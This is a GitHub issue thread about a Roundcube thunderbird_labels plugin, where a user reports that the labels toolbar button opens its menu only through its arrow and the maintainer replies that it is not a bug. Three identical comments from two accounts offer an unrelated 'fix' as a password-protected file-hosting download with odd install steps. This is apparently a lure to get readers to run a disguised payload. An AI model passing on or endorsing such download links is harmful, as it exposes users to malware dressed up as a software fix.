### ISSUE TITLE
Labels toolbar button menu bug

### ISSUE THREAD

**Issue by akissz** [mike-kfed/roundcube-thunderbird_labels#82]
There seems to be a bug when you click the labels button the menu will not display. The menu only activates when you click the down arrow on the edge of the labels button.  This way the button feels like it is malfunctioning. The menu should activate when clicking the button alone. Using Roundcube version 1.6.8. Please fix this issue.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mike-kfed** [comment]
It is not a bug, as the menu works. If you want to improve the software to fulfil your aesthetic needs, feel free to submit a pull request.

**Comment by akissz** [comment]
It is not a aesthetic need. It is a ui bug. Remove the button if the button is not supposed to do something. Buttons were invented to cause a reaction. If the button does nothing, it is broken ui and broken code.
